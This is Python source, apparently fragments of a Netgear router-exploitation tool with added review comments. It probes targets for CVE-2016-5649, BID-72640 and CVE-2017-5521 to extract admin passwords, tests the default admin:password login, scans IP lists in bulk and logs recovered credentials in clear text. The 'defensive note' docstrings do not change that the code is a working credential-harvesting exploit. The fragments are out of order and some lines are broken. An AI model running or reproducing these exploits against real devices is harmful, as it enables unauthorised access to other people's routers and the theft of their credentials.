def cve_2016_5649(router):
    """Probe ``router`` for CVE-2016-5649 and record the verdict on it.

    Fetches ``/BSW_cxttongr.htm`` without authentication, keeps every table
    row that contains a ``<b>`` element, and reads the first double-quoted
    value in the second such row as the admin password.

    Args:
        router: object exposing ``url``; on return its ``exploit``,
            ``username``, ``password`` and ``vulnerable`` attributes are set.

    Returns:
        1 when a password was extracted, 0 otherwise.

    Defensive note: the unauthenticated GET for this page is the observable
    event for this check; nothing else is sent.
    """
    exploit = 'CVE-2016-5649'
    # Last argument of aux.ex_print looks like a newline flag (0 keeps the
    # cursor on the line so the verdict is appended) -- defined in aux, not
    # visible here.
    aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ', 0)
    # NOTE(review): no timeout= here, so an unresponsive host blocks the run;
    # a RequestException is raised outside the try below and propagates to
    # the caller (exploit_act catches it with a bare except).
    r = requests.get(router.url + '/BSW_cxttongr.htm')
    soup = BeautifulSoup(r.text, 'lxml')
    data = []
    for table_row in soup.select("tr"):
        bdata = table_row.findAll('b')
        if len(bdata) > 0:
            data.append(bdata)
    try:
        # data[1] raises IndexError when fewer than two rows matched and
        # .group(1) raises AttributeError when the regex misses; both fall
        # into the bare except and are reported as "NOT vulnerable".
        password = re.search('"(.+?)"', str(data[1])).group(1)
        # Only the password is recovered; the username is a masked placeholder.
        username = '******'
        aux.ex_print('positive', ' Vulnerable! ', 1)
        aux.ex_print('info', '\tCredentials found: ', 0)
        aux.ex_print('positive', username + ':' + password, 1)
        router.exploit = exploit
        router.username = username
        router.password = password
        router.vulnerable = True
        return 1
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit raised in
        # the block above.
        aux.ex_print('error', ' NOT vulnerable', 1)
        router.exploit = 'NOT VULN'
        router.vulnerable = False
        return 0
def bid_72640(router):
    """Probe ``router`` for BID-72640 and record the verdict on it.

    Sends one unauthenticated POST to ``/`` carrying a SOAPAction header for
    ``LANConfigSecurity:1#GetInfo`` and looks for a ``<NewPassword>`` element
    in the response body.

    Args:
        router: object exposing ``url``; on success its ``exploit``,
            ``username``, ``password`` and ``vulnerable`` attributes are set.

    Returns:
        1 when a ``<NewPassword>`` value was found, 0 otherwise.

    Defensive note: the SOAPAction header value on an unauthenticated POST is
    the request characteristic this check depends on.
    """
    # Username is never recovered here; only a masked placeholder is reported.
    username = '******'
    password = ""
    exploit = 'BID-72640'
    aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ', 0)
    # Headers and body are sent verbatim as written, including the
    # 'Content - Length' header name containing spaces and a body that is
    # the literal string 'POST / HTTP/1.1' rather than a SOAP envelope.
    headers = {
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content - Length': '1'
    }
    data = 'POST / HTTP/1.1'
    # NOTE(review): no timeout=; a RequestException raised here is not caught
    # in this function and propagates to the caller.
    r = requests.post(router.url + '/', headers=headers, data=data)
    try:
        # str() of a bytes body yields its repr under Python 3 ("b'...'");
        # the regex still matches inside that text. A miss raises
        # AttributeError on .group(1), which the bare except turns into 0.
        password = re.search('<NewPassword>(.+?)</NewPassword>', str(r.content)).group(1)
    except:
        aux.ex_print('error', ' NOT vulnerable', 1)
        # Unlike the other probes, router.exploit/vulnerable are left
        # untouched on this path.
        return 0
    else:
        aux.ex_print('positive', ' Vulnerable! ', 1)
        aux.ex_print('info', '\tCredentials found: ', 0)
        aux.ex_print('positive', username + ':' + password, 1)
        router.exploit = exploit
        router.username = username
        router.password = password
        router.vulnerable = True
        return 1
def exploit_act(router):
    """Dispatch to the probe registered for ``router.model``.

    Looks the model up in the module-level ``exploits`` table. Without an
    entry the router is marked ``'NO EXP'`` and 0 is returned. Otherwise the
    registered callable is invoked with ``router`` and its result returned;
    anything it raises is reported as not vulnerable, the router is marked
    ``'NOT VULN'`` and 0 is returned.

    Args:
        router: object exposing ``model``; its ``exploit`` attribute may be
            overwritten.

    Returns:
        The probe's return value, or 0 when no probe exists or it raised.
    """
    model = router.model
    if model not in exploits:
        aux.ex_print('error', '\t[-] Exploit NOT found for this model', 1)
        router.exploit = 'NO EXP'
        return 0
    try:
        return exploits[model](router)
    except:
        # Bare except kept as in the original: it also catches
        # KeyboardInterrupt/SystemExit raised inside a probe.
        aux.ex_print('error', '\t[-] NOT vulnerable', 1)
        router.exploit = 'NOT VULN'
        return 0
def ng_login1(router):
    """Check whether ``router`` accepts the factory default admin login.

    Issues one GET to ``/`` with an HTTP Basic ``Authorization`` header (the
    base64 of ``admin:password``, as the original comment states) and treats
    an HTTP 200 as a successful login.

    Args:
        router: object exposing ``url``; on success ``default_login``,
            ``username``, ``password``, ``vulnerable`` and ``exploit`` are set.

    Returns:
        1 when the default credentials were accepted, 0 otherwise.

    Defensive note: the condition detected here is an unchanged factory
    password; the response code alone is the evidence used.
    """
    # Test admin:password, passed as a base64 encoded string
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Authorization": "Basic YWRtaW46cGFzc3dvcmQ=",
        "DNT": "1",
        "Connection": "close",
        "Cache-Control": "max-age=0"
    }
    # NOTE(review): no timeout=, and a RequestException is not caught here.
    # Any 200 counts as success; a device that serves a 200 landing page
    # regardless of credentials would be reported as a false positive.
    if requests.get(router.url + '/', headers=headers, verify=False).status_code == requests.codes.ok:
        aux.ex_print('info', '\tDefault credentials in use: ', 0)
        aux.ex_print('positive', 'admin:password', 1)
        router.default_login = True
        # Stored masked; the actual values are only echoed to the console above.
        router.username = '******'
        router.password = '******'
        router.vulnerable = True
        router.exploit = "Default PWD"
        return 1
    else:
        aux.ex_print('error', '\t[-] Default credentials not in use', 1)
        return 0
def __init__(self, opt):
    """Build the object and immediately scan the target named in ``opt``.

    Stores ``opt.ip`` and an empty open-port list, announces the target,
    then runs the private web-server/brand detection. A 0 result from that
    step is reported as brand/model not found. Constructing an instance
    therefore performs network activity.

    Args:
        opt: options object exposing ``ip`` and whatever the detection
            routine reads from it.
    """
    self.ip = opt.ip
    self.open_ports = []
    aux.ex_print('info', '\nTesting: ' + self.ip, 1)
    aux.ex_print('action', '[*] Try to detect web server on default ports...', 1)
    detected = self.__check_webserver(opt)
    # The trailing '1' is a string here while sibling calls pass the int 1;
    # reproduced unchanged.
    if detected == 0:
        aux.ex_print('error', '\t[-] Brand/Model not found! ', '1')
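if args.output_file:
    opt.o_file = True
    opt.o_file_name = args.output_file
aux.banner(__version__)
if opt.single_ip:
    # Single-target mode: constructing Router performs the whole scan and
    # reports to the console only; nothing is written to the output file.
    router = classes.Router(opt)
    del router
else:
    # Count the targets once. The original called aux.file_len on every
    # iteration, i.e. one extra pass over the list file per target.
    total = aux.file_len(opt.list_file)
    with open(opt.list_file, 'r') as ip_list:
        for i, line in enumerate(ip_list, start=1):
            opt.ip = line.replace("\n", "")
            aux.ex_print("info", "Processing IP number " + str(i) + " of " + str(total), 1)
            router = classes.Router(opt)
            router.open_ports = []
            # Write the result to the outfile even when the router is not
            # exploitable. `with` closes the handle on every path; as collapsed
            # in the original the close() appears to sit outside the `if`,
            # which would fail when no output file was requested.
            # The file holds recovered credentials in clear text -- the
            # vulnerable row has 7 comma-separated fields, the other row 4;
            # the layout is kept as is for existing consumers.
            if opt.o_file:
                with open(opt.o_file_name, 'a') as output:
                    if router.vulnerable:
                        output.write(router.model + ',' + router.ip + ',' + router.port + ',' + str(
                            router.vulnerable) + ',' + router.exploit + ',' + router.username + ',' + router.password + '\n')
                    elif router.model != '':
                        output.write(
                            router.model + ',' + router.ip + ',' + router.port + ',' + router.exploit + '\n')
            del router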
def cve_2017_5521(router):
    """Probe ``router`` for CVE-2017-5521 and record the verdict on it.

    Extracts an ``id=`` token from the already-fetched landing page
    (``router.body``), POSTs to ``/passwordrecovered.cgi`` with it and, when
    the response contains the ``left">`` table marker, scrapes the username
    and password cells.

    Args:
        router: object exposing ``url`` and ``body`` (a BeautifulSoup
            document set by the web-server detection step); on success its
            ``exploit``, ``username``, ``password`` and ``vulnerable``
            attributes are set.

    Returns:
        1 when credentials were scraped, 0 otherwise.

    Defensive note: the POST to ``/passwordrecovered.cgi`` with a token taken
    from the login page is the request this check relies on.
    """
    token = ''
    exploit = 'CVE-2017-5521'
    aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ', 0)
    # NOTE(review): .group(1) raises AttributeError when the page has no
    # id="..." -- not caught here, so it propagates to the caller. Because
    # (.+?) needs at least one character, token is never '' after a match
    # and the outer else branch below is effectively unreachable.
    token = re.search('id=(.+?)"', str(router.body)).group(1)
    if token != '':
        r = requests.post(router.url + '/passwordrecovered.cgi?id=' + token, verify=False, timeout=2)
        if r.text.find('left\">') != -1:
            # scrape() is a helper defined elsewhere in the file (not shown);
            # presumably returns the text between the two delimiters. repr()
            # plus a second scrape on '>' and the quote strips the outer
            # repr quotes from the cell content.
            username = (repr(
                scrape(r.text, 'Router Admin Username</td>', '</td>')))
            username = scrape(username, '>', '\'')
            password = (repr(
                scrape(r.text, 'Router Admin Password</td>', '</td>')))
            password = scrape(password, '>', '\'')
            # Presumably the sentinel scrape() returns when the English
            # labels are absent; fall back to the first and last 'left">'
            # cells instead -- TODO confirm against scrape().
            if username == "i_dont_speak_english":
                username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
                password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
        else:
            aux.ex_print('error', 'NOT vulnerable', 1)
            router.exploit = 'NOT VULN'
            router.vulnerable = False
            return 0
        # html encoding pops out of nowhere, lets replace that
        # NOTE(review): as shown, both replace() calls have identical
        # arguments and are no-ops; the original first arguments were
        # probably HTML entity forms lost when the file was rendered.
        password = password.replace("#", "#")
        password = password.replace("&", "&")
        aux.ex_print('positive', ' Vulnerable! ', 1)
        aux.ex_print('info', '\tCredentials found: ', 0)
        aux.ex_print('positive', username + ':' + password, 1)
        router.exploit = exploit
        router.username = username
        router.password = password
        router.vulnerable = True
    else:
        aux.ex_print('error', 'NOT vulnerable', 1)
        router.exploit = 'NOT VULN'
        router.vulnerable = False
        return 0
    # return 1
    return 1
def test():
    """Placeholder probe used for debugging the dispatch path.

    Prints a marker to stdout, emits a 'positive' line through aux.ex_print
    and always reports success.

    Returns:
        1, unconditionally.
    """
    marker = "debug"
    print(marker)
    status = 1
    aux.ex_print('positive', '\tExploit!!!!', status)
    return status
def __check_webserver(self, opt):
    """Locate a web server on the target and identify its brand.

    Probes each port in ``self.__default_ports`` (defined elsewhere) with
    ``self.__is_open``, then tries http:// and https:// on every open port.
    The first reachable URL is recorded in ``self.url``/``body``/``header``;
    a Netgear match runs the default-credential check and, if that fails,
    the exploit search; a D-Link match only records the brand.

    Args:
        opt: options object; accepted but not read in this method.

    Returns:
        1 when the brand detection branch was reached (and, as written, also
        when no open port was found); 0 when open ports exist but no
        reachable web server matched a known brand.
    """
    for t in self.__default_ports:
        if self.__is_open(t) == 1:
            self.open_ports.append(t)
    if not len(self.open_ports) > 0:
        aux.ex_print('error', '\t[-] Web server not found', '1')
        # NOTE(review): returns 1 here, the same value as the success paths;
        # __init__ only reports "Brand/Model not found" on 0 -- confirm intended.
        return 1
    aux.ex_print('positive', '\t[+] Found open ports: ' + str(self.open_ports), '1')
    protocol = ["http://", "https://"]
    # Try every combination of port/protocol to find an usable web server
    for port in self.open_ports:
        for prot in protocol:
            try:
                # port is concatenated as a string; __default_ports is
                # presumably a list of str -- TODO confirm.
                url_to_test = prot + self.ip + ':' + port
                r = requests.get(url_to_test, verify=False, timeout=3)
            except requests.exceptions.RequestException as e:
                # 'e' is unused and 'pass' is redundant; the failure is only
                # logged and the next protocol/port is tried.
                aux.ex_print('error', 'DEBUG: Error in request', 1)
                pass
            else:
                self.body = BeautifulSoup(r.text, 'lxml')
                self.header = r.headers
                # we have found a webserver on the open port
                aux.ex_print('positive', '\t[+] Found web server: ' + url_to_test, '1')
                self.url = url_to_test
                # try to detect if is a netgear, a dlink...
                aux.ex_print('action', '[*] Try to identify brand/model...', 1)
                # aux.is_netgear is evaluated twice on the same headers.
                if aux.is_netgear(self.header) != '':
                    self.netgear = True
                    self.model = aux.is_netgear(self.header)
                    self.port = port
                    aux.ex_print('positive', '\t[+] Found Brand/Model : ' + self.model, '1')
                    aux.ex_print('action', '[*] Check default creds ...', '1')
                    if exploit.login_act(self) == 1:
                        r.close()
                        return 1
                    else:
                        # exploit_act's return value is not checked; the
                        # router attributes it sets carry the result.
                        aux.ex_print('action', '[*] Search for exploit ...', '1')
                        exploit.exploit_act(self)
                        r.close()
                        return 1
                elif aux.is_dlink(self.body):
                    self.dlink = True
                    # NOTE(review): reads aux.model (a module attribute) rather
                    # than the is_dlink() result, and self.port is not set on
                    # this branch -- confirm against aux.
                    self.model = aux.model
                    r.close()
                    return 1
                r.close()
    return 0